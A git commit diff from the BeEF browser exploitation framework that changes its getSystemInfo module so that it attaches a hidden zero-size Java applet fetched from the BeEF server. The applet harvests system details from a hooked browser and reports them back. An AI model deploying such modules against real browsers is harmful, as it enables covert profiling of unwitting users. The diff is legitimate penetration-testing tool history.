Modified host/getSystemInfo module to use the attachApplet JS API

git-svn-id: https://beef.googlecode.com/svn/trunk@1389 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
antisnatchor
2011-11-02 11:07:24 +00:00
parent 8a3977ff78
commit 1ccd322b13

View File

@@ -17,8 +17,7 @@ beef.execute(function() {
var internal_counter = 0;
var output;
var content = "<APPLET code='getSystemInfo' codebase='http://"+beef.net.host+":"+beef.net.port+"/' width=0 height=0 id=getSystemInfo name=getSystemInfo></APPLET>";
$j('body').append(content);
beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', "http://"+beef.net.host+":"+beef.net.port+"/", null, null);
if (beef.browser.isFF()) {
@@ -36,7 +35,7 @@ beef.execute(function() {
} catch (e) {
internal_counter++;
if (internal_counter > 30) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=time out');
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=Timeout after 20 seconds');
$j('#getSystemInfo').detach();
return;
}